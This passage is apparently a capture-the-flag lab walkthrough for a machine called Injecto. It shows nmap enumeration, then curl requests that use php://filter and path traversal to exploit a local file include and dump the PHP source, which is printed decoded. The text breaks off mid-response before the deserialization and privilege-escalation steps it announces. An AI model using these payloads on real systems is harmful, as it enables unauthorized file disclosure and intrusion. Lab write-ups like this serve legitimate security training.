WALKTHROUGH
Exploitation Guide for Injecto
Summary
In this guide, we will gain a foothold on the target system by using a local file include in conjunction with a PHP deserialization vulnerability. We will then elevate our access to root by leveraging curl with SUID.
Enumeration
Nmap
We’ll start by looking for open ports with an nmap scan.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.120.209
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-30 15:24 EST
Nmap scan report for 192.168.120.209
Host is up (0.037s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Blackdeath & Coronavirus
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Pandemic Portal
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have discovered SSH running on port 22, an Apache server on port 80, and an Nginx server on port 8080.
Webserver Enumeration
Let’s start by opening the webserver on port 80 in the browser.
Blackdeath & Coronavirus webpage
We are presented with a simple webpage with 2 buttons labeled “Blackdeath” and “Coronavirus”. Clicking on a button adds the respective value to a URL parameter named “page”.
http://192.168.120.209/?page=blackdeath
http://192.168.120.209/?page=coronavirus
If we change the value of the page parameter to anything other than “Blackdeath” or “Coronavirus”, a message is shown on the page stating “Tampering Detected!“.
http://192.168.120.209/?page=banana
Invalid Parameter
It appears that the webserver has a list of allowed parameters. Maybe the webserver is only checking if the page parameter contains the allowed words instead of checking if it is one of the allowed words.
The use of the page parameter name implies that there may be a file on the webserver named “blackdeath”. We can use a Local File Include wrapper like the ones found here to attempt to dump the source. If we can get the PHP engine to base64-encode the blackdeath file, it won’t be executed, and we should be able to view the PHP source.
Exploitation
Local File Include Vulnerability
Let’s craft a payload using curl.
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
PGltZyBzcmM9ImJsYWNrZGVhdGgvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0KPGJyPg0KPGJyPg0KPHA+IFRoZSBCbGFjayBEZWF0aCAoYWxzbyBrbm93biBhcyB0aGUgUGVzdGlsZW5jZSwgdGhlIEdyZWF0IE1vcnRhbGl0eSBvciB0aGUgUGxhZ3VlKSB3YXMgYSBidWJvbmljIHBsYWd1ZSBwYW5kZW1pYyBvY2N1cnJpbmcgaW4gQWZyby1FdXJhc2lhIGZyb20gMTM0NiB0byAxMzUzLlthXSBJdCBpcyB0aGUgbW9zdCBmYXRhbCBwYW5kZW1pYyByZWNvcmRlZCBpbiBodW1hbiBoaXN0b3J5LCBjYXVzaW5nIHRoZSBkZWF0aCBvZiA3NeKAkzIwMCBtaWxsaW9uIHBlb3BsZSBpbiBFdXJhc2lhIGFuZCBOb3J0aCBBZnJpY2EsIHBlYWtpbmcgaW4gRXVyb3BlIGZyb20gMTM0NyB0byAxMzUxLiBCdWJvbmljIHBsYWd1ZSBpcyBjYXVzZWQgYnkgdGhlIGJhY3Rlcml1bSBZZXJzaW5pYSBwZXN0aXMsIGJ1dCBpdCBtYXkgYWxzbyBjYXVzZSBzZXB0aWNhZW1pYyBvciBwbmV1bW9uaWMgcGxhZ3Vlcy48L3A+DQo8IS0tIFJlZmVyZW5jZSBodHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9CbGFja19EZWF0aCAtLT4= </div>
</body>
</html>
We find a base64 string included in the webserver response. Let’s decode it by echoing it into base64 -d.
┌──(kali㉿kali)-[~]
└─$ echo "PGltZyBzcmM9ImJsYWNrZGVhdGgvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0KPGJyPg0KPGJyPg0KPHA+IFRoZSBCbGFjayBEZWF0aCAoYWxzbyBrbm93biBhcyB0aGUgUGVzdGlsZW5jZSwgdGhlIEdyZWF0IE1vcnRhbGl0eSBvciB0aGUgUGxhZ3VlKSB3YXMgYSBidWJvbmljIHBsYWd1ZSBwYW5kZW1pYyBvY2N1cnJpbmcgaW4gQWZyby1FdXJhc2lhIGZyb20gMTM0NiB0byAxMzUzLlthXSBJdCBpcyB0aGUgbW9zdCBmYXRhbCBwYW5kZW1pYyByZWNvcmRlZCBpbiBodW1hbiBoaXN0b3J5LCBjYXVzaW5nIHRoZSBkZWF0aCBvZiA3NeKAkzIwMCBtaWxsaW9uIHBlb3BsZSBpbiBFdXJhc2lhIGFuZCBOb3J0aCBBZnJpY2EsIHBlYWtpbmcgaW4gRXVyb3BlIGZyb20gMTM0NyB0byAxMzUxLiBCdWJvbmljIHBsYWd1ZSBpcyBjYXVzZWQgYnkgdGhlIGJhY3Rlcml1bSBZZXJzaW5pYSBwZXN0aXMsIGJ1dCBpdCBtYXkgYWxzbyBjYXVzZSBzZXB0aWNhZW1pYyBvciBwbmV1bW9uaWMgcGxhZ3Vlcy48L3A+DQo8IS0tIFJlZmVyZW5jZSBodHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9CbGFja19EZWF0aCAtLT4=" | base64 -d
<img src="blackdeath/<?php echo rand(1, 10); ?>.jpg" />
<p> The Black Death (also known as the Pestilence, the Great Mortality or the Plague) was a bubonic plague pandemic occurring in Afro-Eurasia from 1346 to 1353.[a] It is the most fatal pandemic recorded in human history, causing the death of 75–200 million people in Eurasia and North Africa, peaking in Europe from 1347 to 1351. Bubonic plague is caused by the bacterium Yersinia pestis, but it may also cause septicaemic or pneumonic plagues.</p>
<!-- Reference https://en.wikipedia.org/wiki/Black_Death -->
Success! We are able to read the PHP source of blackdeath.php. We can assume “.php” is added to the end of the parameter as this file contains PHP script. This means we will only be able to read PHP files using this method.
Let’s modify this payload to get the index.php file. We still need to include the text “blackdeath” in the payload. Additionally, we don’t know exactly where the index.php file is. We can assume it’s in a directory above where blackdeath.php is. With this in mind, we can append “index” to the end of our last payload and add additional ../ between “backdeath” and “index” until we get a base64 string in the response.
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeathindex
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
</div>
</body>
</html>
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath../index
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
</div>
</body>
</html>
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath../../index
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
PCFET0NUWVBFIEhUTUw+DQo8aHRtbD4NCg0KPGhlYWQ+DQogICAgPHRpdGxlPkJsYWNrZGVhdGggJiBDb3JvbmF2aXJ1czwvdGl0bGU+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iL3N0eWxlLmNzcyI+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KICAgIDxoMT5EZWFkbHkgVmlydXNlcyDwn5KAPC9oMT4NCiAgICA8aT5BIHJlc2VhcmNoIG9uIHZhcmlvdXMgZGVhZGx5IHZpcnVzZXMuPC9pPg0KICAgIDxkaXY+DQogICAgICAgIDxoMj5XaGF0IHdvdWxkIHlvdSBsaWtlIHRvIGtub3cgbW9yZSBhYm91dD88L2gyPg0KICAgICAgICA8YSBocmVmPSIvP3BhZ2U9YmxhY2tkZWF0aCI+PGJ1dHRvbiBpZD0iYmxhY2tkZWF0aCI+QmxhY2tkZWF0aDwvYnV0dG9uPjwvYT4gDQogICAgICAgIDxhIGhyZWY9Ii8/cGFnZT1jb3JvbmF2aXJ1cyI+PGJ1dHRvbiBpZD0iY29yb25hdmlydXMiPkNvcm9uYXZpcnVzPC9idXR0b24+PC9hPg0KICAgICAgICA8YnI+DQogICAgICAgIDw/cGhwDQogICAgICAgICAgICBmdW5jdGlvbiBjb250YWluc1N0cigkc3RyLCAkc3Vic3RyKSB7DQogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7DQogICAgICAgICAgICB9DQoJICAgICAgICAkZXh0ZW5zaW9uID0gJy5waHAnOw0KICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3BhZ2UnXSkpIHsNCiAgICAgICAgICAgICAgICBpZihjb250YWluc1N0cigkX0dFVFsncGFnZSddLCAnYmxhY2tkZWF0aCcpIHx8IGNvbnRhaW5zU3RyKCRfR0VUWydwYWdlJ10sICdjb3JvbmF2aXJ1cycpKSB7DQogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3BhZ2UnXSAuICRleHRlbnNpb247DQogICAgICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgZWNobyAnVGFtcGVyaW5nIERldGVjdGVkISc7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KICAgICAgICA/Pg0KICAgIDwvZGl2Pg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo= </div>
</body>
</html>
Once we find a base64 string in the response, we decode it the same way we did before.
┌──(kali㉿kali)-[~]
└─$ echo "PCFET0NUWVBFIEhUTUw+DQo8aHRtbD4NCg0KPGhlYWQ+DQogICAgPHRpdGxlPkJsYWNrZGVhdGggJiBDb3JvbmF2aXJ1czwvdGl0bGU+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iL3N0eWxlLmNzcyI+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KICAgIDxoMT5EZWFkbHkgVmlydXNlcyDwn5KAPC9oMT4NCiAgICA8aT5BIHJlc2VhcmNoIG9uIHZhcmlvdXMgZGVhZGx5IHZpcnVzZXMuPC9pPg0KICAgIDxkaXY+DQogICAgICAgIDxoMj5XaGF0IHdvdWxkIHlvdSBsaWtlIHRvIGtub3cgbW9yZSBhYm91dD88L2gyPg0KICAgICAgICA8YSBocmVmPSIvP3BhZ2U9YmxhY2tkZWF0aCI+PGJ1dHRvbiBpZD0iYmxhY2tkZWF0aCI+QmxhY2tkZWF0aDwvYnV0dG9uPjwvYT4gDQogICAgICAgIDxhIGhyZWY9Ii8/cGFnZT1jb3JvbmF2aXJ1cyI+PGJ1dHRvbiBpZD0iY29yb25hdmlydXMiPkNvcm9uYXZpcnVzPC9idXR0b24+PC9hPg0KICAgICAgICA8YnI+DQogICAgICAgIDw/cGhwDQogICAgICAgICAgICBmdW5jdGlvbiBjb250YWluc1N0cigkc3RyLCAkc3Vic3RyKSB7DQogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7DQogICAgICAgICAgICB9DQoJICAgICAgICAkZXh0ZW5zaW9uID0gJy5waHAnOw0KICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3BhZ2UnXSkpIHsNCiAgICAgICAgICAgICAgICBpZihjb250YWluc1N0cigkX0dFVFsncGFnZSddLCAnYmxhY2tkZWF0aCcpIHx8IGNvbnRhaW5zU3RyKCRfR0VUWydwYWdlJ10sICdjb3JvbmF2aXJ1cycpKSB7DQogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3BhZ2UnXSAuICRleHRlbnNpb247DQogICAgICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgZWNobyAnVGFtcGVyaW5nIERldGVjdGVkISc7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KICAgICAgICA/Pg0KICAgIDwvZGl2Pg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo=" | base64 -d
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$extension = '.php';
if(isset($_GET['page'])) {
if(containsStr($_GET['page'], 'blackdeath') || containsStr($_GET['page'], 'coronavirus')) {
include $_GET['page'] . $extension;
} else {
echo 'Tampering Detected!';
}
}
?>
</div>
</body>
</html>
We can now see how the parameter filter works by viewing the source of index.php. There isn’t much more to gain here at the moment.
Let’s take a look at the webserver running on port 8080. Opening http://192.168.120.209:8080 in the browser shows us a page that appears to be in development. There is a form at the bottom, but it doesn’t appear to do much. We know this is running Nginx from our port scan. Maybe we can use the LFI vulnerability on the apache webserver to read the source of this in development page. To do this, we need to know the location of the index file hosted by Nginx.
This file could be in a few different places on the target system:
- /usr/share/nginx/
- /var/opt/
- /opt/www/
- /var/www/
We need to attempt to dump index.php from each of these directories and check the response for a base64 string. We can use curl again and try each directory making sure to add “index” to the end, and omitting the .php as we know it’s appended by the PHP script.
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath../../../../../../../../usr/share/nginx/index
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
</div>
</body>
</html>
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath../../../../../../../../var/opt/index
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
</div>
</body>
</html>
...
This file doesn’t appear to be in these locations. Perhaps it is in a /html directory under one of these locations. Let’s try again and adding this sub-directory.
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.120.209/?page=php://filter/convert.base64-encode/resource=blackdeath../../../../../../../../usr/share/nginx/html/index
<!DOCTYPE HTML>
<html>
<head>
<title>Blackdeath & Coronavirus</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>Deadly Viruses ?</h1>
<i>A research on various deadly viruses.</i>
<div>
<h2>What would you like to know more about?</h2>
<a href="/?page=blackdeath"><button id="blackdeath">Blackdeath</button></a>
<a href="/?page=coronavirus"><button id="coronavirus">Coronavirus</button></a>
PCFkb2N0eXBlIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KICAgPGhlYWQ+CiAgICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgICAgPHRpdGxlPlBhbmRlbWljIFBvcnRhbDwvdGl0bGU+CiAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGUuY3NzIj4KICAgPC9oZWFkPgogICA8Ym9keT4KICAgICAgPGRpdiBjbGFzcz0id2hvbGVhcHAiPgogICAgICAgICA8YnI+PGJyPjxicj48YnI+PGJyPgogICAgICAgICA8aDE+U3VibWl0IGluZm8gYWJvdXQgb25nb2luZyBwYW5kZW1pYzwvaDE+CiAgICAgICAgIDxicj48YnI+CiAgICAgICAgIDxwPlRoZSBXb3JsZCBIZWFsdGggT3JnYW5pemF0aW9uIGRlY2xhcmVkIENPVklELTE5IGEgcGFuZGVtaWMgYmVjYXVzZSBvZiB0aGUgdW51c3VhbGx5IGZhc3QgcmF0ZSBpbiB3aGljaCB0aGUgdmlydXMgaXMgc3ByZWFkaW5nLiBUaGUgbm92ZWwgY29yb25hdmlydXMgaGFzIGluZmVjdGVkIG1vcmUgdGhhbiBoYWxmIGEgbWlsbGlvbiBwZW9wbGUgd29ybGR3aWRlIGFuZCBpcyBwcmVzZW50IGluIG1vcmUgdGhhbiAxNzUgY291bnRyaWVzLiBUaGUgZGlmZmVyZW5jZSBiZXR3ZWVuIGVwaWRlbWljIGFuZCBwYW5kZW1pYyBpcyB0aGF0IEFuIGVwaWRlbWljIGJlY29tZXMgYSBwYW5kZW1pYyB3aGVuIGl0IGlzIHNwcmVhZGVkIGdsb2JhbGx5LjwvcD4KICAgICAgICAgPGhyPgogICAgICAgICA8aDMgaWQ9Im1haW5oZWFkbGluZSI+IE1lYXN1cmVtZW50IHN0ZXBzIHRvIGNvcGUgd2l0aCBDT1ZJRC0xOSB2aXJ1czo8L2gzPgogICAgICAgICA8dWw+CiAgICAgICAgIDxicj48YnI+PGJyPgogICAgICAgICAgICA8c3Ryb25nPkludGVsbGlnZW5jZTwvc3Ryb25nPgogICAgICAgICAgICA8b2w+CiAgICAgICAgICAgICAgIDxsaT5Vc2luZyBzZWFyY2ggJiBkZXRlY3Rpb24gbWVhbnMgdG8gZGV0ZWN0IGluZmVjdGVkIHN1cmZhY2VzLCBkb21haW4gYW5kIGJlaW5ncyAoSHVtYW4sIGFuaW1hbHMsIGZsb3JhLCBldGMuKS4gPC9saT4KICAgICAgICAgICAgICAgPGxpPlN1cnZleSB0byB1bmRlcnN0YW5kIHRoZSBleHRlbnQgb2YgdGhlIHBhbmRlbWljLiA8L2xpPgogICAgICAgICAgICAgICAgICA8bGk+IEhvdyBHZXJtYW55IGlzIG1hbmFnaW5nIGl0cyBjb3JvbmF2aXJ1cyBlcGlkZW1pYz8gSG93IGlzIHRoYXQgIGdlcm1hbnkgaGFzIHJlbGF0aXZlbHkgbG93IG1vcnRhbGl0eSByYXRlIHJlc3BlY3QgdG8gdGhlIGV4dGVudCBlc2NhbGF0aW5nIGluZmVjdGlvbnM/IEdvb2QgSGVhbHRoLXN5c3RlbSBhbmQgYXZhaWxhYmlsaXR5IGludm9sdmVkIHdpdGggcmVhc29uYWJsZSByZWxhdGlvbnNoaXAgKHJhdGlvKSBiZXR3ZWVuIGVsZGVybHkgYW5kIHlvdW5nZXIgKGluZmVjdGVkIClwb3B1bGF0aW9uLjwvbGk+CiAgICAgICAgICAgICAgICAgIDxsaT4gSG93IFNvdXRoIEtvcmVhIGhhcyBGbGF0dGVuZWQgaXRzIGNvcm9uYXZpcnVzIEN1cnZlPzwvbGk+CiAgICAgICAgICAgICAgICAgIDxsaT4gV2hhdCBpcyB0aGUgYmVzdCBkYXRhLWJhc2UgbWFuYWdlbWVudCBtZXRob2Q/PC9saT4KICAgICAgICAgICAgICAgICAgPGxpPldoYXQgaXMgdGhlIGVmZmVjdCBvZiB0aGUgY2xvc3VyZSBhbmQgdGhlIGZvcm0gb2YgaXNvbGF0aW9uIGR1ZSB0byB0aGUgY29yb25hdmlydXMgcGFuZGVtaWM/IDwvbGk+CiAgICAgICAgICAgICAgICAgIDxsaT4gV2hhdCBhcmUgdGhlIG1vc3QgYWR2YW5jZWQgdHJlYXRtZW50cyBhbmQgbWVhbnMgdG8gY29wZSB3aXRoIGNvbmF2aXJ1cyBwYW5kZW1pYz88L2xpPgogICAgICAgICAgICAgICA8bGk+IE1vbml0b3IgdGhlIHBhdGllbnRzIGFuZCB0aGUgaW5mZWN0ZWQgY2FzdWFsdGllcyBieSBhcHByb3ZlZCBtZXRob2QuPC9saT4KICAgICAgICAgICAgPC9vbD4KICAgICAgICAgICAgPGJyPjxicj48YnI+CiAgICAgICAgICAgIDxzdHJvbmc+UmVzZWFyY2g8L3N0cm9uZz4KICAgICAgICAgICAgPGxpPiBhLiBQcmV2ZW50aW9uIHRocm91Z2ggaXNvbGF0aW9uLCB1c2Ugb2YgbWFza3MgYW5kIHByb3RlY3RpdmUgZXF1aXBtZW50IChjbG90aGluZywgc2hvZXMsIGV0Yy4pLjwvbGk+CiAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgYi4gSGVhbGluZyB0aHJvdWdoIGluaGliaXRvcnkgZHJ1Z3MgYXQgdmFyaW91cyBzdGFnZXMuCiAgICAgICAgICAgIDwvbGk+CgogICAgICAgICAgICA8IS0tIFVuZGVyIERldmVsb3BtZW50IC0tIHIxcHAzcjY5NDQgY2FuIHlvdSBjb21wbGV0ZSBjb2RlIGluIGRiY29ubmVjdC5waHAgZm9yIG15c3FsIC0tPgoKICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICBjLiBEZWFsaW5nIHdpdGggdGhlIGRpc2Vhc2UgLSByZXNwaXJhdG9ycywgYmVpbmcgaW4gaXNvbGF0aW9uLCAocHJldmVudGluZyBpbmZlY3Rpb24gYW5kIGV4YWNlcmJhdGlvbikuCiAgICAgICAgICAgIDwvbGk+CiAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgZC4gVG90YWwgaGVhbGluZyAtIFVuZGVyc3RhbmRpbmcgaG93IHRoZSB2aXJ1cyB3b3JrcyBhbmQgdXNpbmcgYW50aWJvZGllcyBvciBzaW1pbGFyIGRydWdzIHRvIGRlYWwgd2l0aC4KICAgICAgICAgICAgPC9saT4KICAgICAgICAgICAgPGJyPjxicj48YnI+CiAgICAgICAgICAgIDxzdHJvbmc+Q29waW5nPC9zdHJvbmc+OgogICAgICAgICAgICA8bGk+IGEuIFRoZSBwc3ljaG9sb2dpY2FsIGVmZmVjdHMgb2YgaXNvbGF0aW9uLjwvbGk+CiAgICAgICAgICAgIDxsaT4gYi4gRmFpbHVyZSBvZiBkcnVnIHRyaWFscy48L2xpPgogICAgICAgICAgICA8bGk+IGMuIExvYWRzIGluIHRoZSBlbWVyZ2VuY3kgcm9vbXMuPC9saT4KICAgICAgICAgICAgPGxpPiBkLiBPdmVybG9hZCBpbiBzaG9wcyAmIGRlcGFydG1lbnQgc3RvcmVzLjwvbGk+CiAgICAgICAgICAgIDxsaT4gZS4gRWNvbm9taWMgYWN0aXZpdHkgcmVkdWN0aW9uIGFuZCB1bmVtcGxveW1lbnQuPC9saT4KICAgICAgICAgICAgPGJyPjxicj48YnI+CiAgICAgICAgICAgIDxzdHJvbmc+QWN0aW9uczwvc3Ryb25nPjogCiAgICAgICAgICAgIDxsaT4gYS4gQ29uY3VycmVudCBjb3BpbmcgLSBsZWFybiBhYm91dCBob3cgaXQgc3ByZWFkcywgc3RpY2tzLCBhbmQgYWN0cyB3aGlsZSB0cnlpbmcgdG8gcHJldmVudCBpdHMgc3ByZWFkIGFuZCBkZWxheS48L2xpPgogICAgICAgICAgICA8bGk+IGIuIFVzZSBvZiBzaW1pbGFyIHZpcnVzZXMgbWVkaWNhdGlvbnMgYW5kIGFudGlib2RpZXMgZnJvbSBwZW9wbGUgd2hvIGhhdmUgaGVhbGVkLjwvbGk+CiAgICAgICAgIDwvdWw+CiAgICAgICAgIDxibG9ja3F1b3RlPgogICAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIllvdSBuZXZlciBjaGFuZ2UgeW91ciBsaWZlIHVudGlsIHlvdSBzdGVwIG91dCBvZiB5b3VyIGNvbWZvcnQgem9uZTsgY2hhbmdlIGJlZ2lucyBhdCB0aGUgZW5kIG9mIHlvdXIgY29tZm9ydCB6b25lLiIKICAgICAgICAgICAgPC9wPgogICAgICAgICAgICA8Y2l0ZT4tLSBEciBSb3kgVC4gQmVubmV0dDwvY2l0ZT4KICAgICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICJTb21ldGltZXMgdGhlIHF1ZXN0aW9ucyBhcmUgY29tcGxpY2F0ZWQgYW5kIHRoZSBhbnN3ZXJzIGFyZSBzaW1wbGUuLiIKICAgICAgICAgICAgPC9wPgogICAgICAgICAgICA8Y2l0ZT4tLSBEci4gU2V1c3M8L2NpdGU+CiAgICAgICAgIDwvYmxvY2txdW90ZT4KICAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iZ2V0Ij4KICAgICAgICAgICAgPGZpZWxkc2V0PgogICAgICAgICAgICAgICA8bGVnZW5kPllvdXIgcmVzZWFyY2ggIHNhdmVkICBhbmQgd2lsbCBiZSByZXZpZXdlZCBieSBvdXIgZmFjdWx0eSBzb29uPC9sZWdlbmQ+CiAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9Im5vdGlvbiI+CiAgICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9Im5hbWUiPlJlc2VhcmNoIE5hbWU8L2xhYmVsPgogICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ibmFtZSIgaWQ9Im5hbWUiPgogICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm90aW9uIj4KICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0iZW1haWwiPkVtYWlsPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImVtYWlsIiBpZD0iZW1haWwiPgogICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm90aW9uIj4KICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0idGV4dGFyZWEiPkluZm88L2xhYmVsPgogICAgICAgICAgICAgICAgICA8dGV4dGFyZWEgcm93cz0iMTAiIGNvbHM9IjMwIiBuYW1lPSJjb21tZW50cyIgaWQ9ImNvbW1lbnRzIj48L3RleHRhcmVhPgogICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibm90aW9uIj4KICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0ic2VsZWN0Ij5Mb2NhdGlvbjo8L2xhYmVsPgogICAgICAgICAgICAgICAgICA8c2VsZWN0IG5hbWU9InNlbGVjdCIgaWQ9InNlbGVjdCI+CiAgICAgICAgICAgICAgICAgICAgIDxvcHRncm91cCBsYWJlbD0iT3B0aW9uIEdyb3VwIDEiPgogICAgICAgICAgICAgICAgICAgICAgICA8b3B0aW9uIHZhbHVlPSIxIj5VU0E8L29wdGlvbj4KICAgICAgICAgICAgICAgICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMiI+TWV4aWNvPC9vcHRpb24+CiAgICAgICAgICAgICAgICAgICAgICAgIDxvcHRpb24gdmFsdWU9IjMiPkVuZ2xhbmQ8L29wdGlvbj4KICAgICAgICAgICAgICAgICAgICAgPC9vcHRncm91cD4KICAgICAgICAgICAgICAgICAgPC9zZWxlY3Q+CiAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJub3Rpb24iPgogICAgICAgICAgICAgICAgICA8dWw+CiAgICAgICAgICAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBjbGFzcz0iYnVsbGV0IiBuYW1lPSJidWxsZXQiIGlkPSJidWxsZXQxIiB2YWx1ZT0iMSIgLz4KICAgICAgICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0iYnVsbGV0MSI+TG93IFByaW9yaXR5PC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICAgPC9saT4KICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGNsYXNzPSJidWxsZXQiIG5hbWU9ImJ1bGxldCIgaWQ9ImJ1bGxldDIiIHZhbHVlPSIyIiAvPgogICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJidWxsZXQyIj5NZWRpdW0gUHJpb3JpdHk8L2xhYmVsPgogICAgICAgICAgICA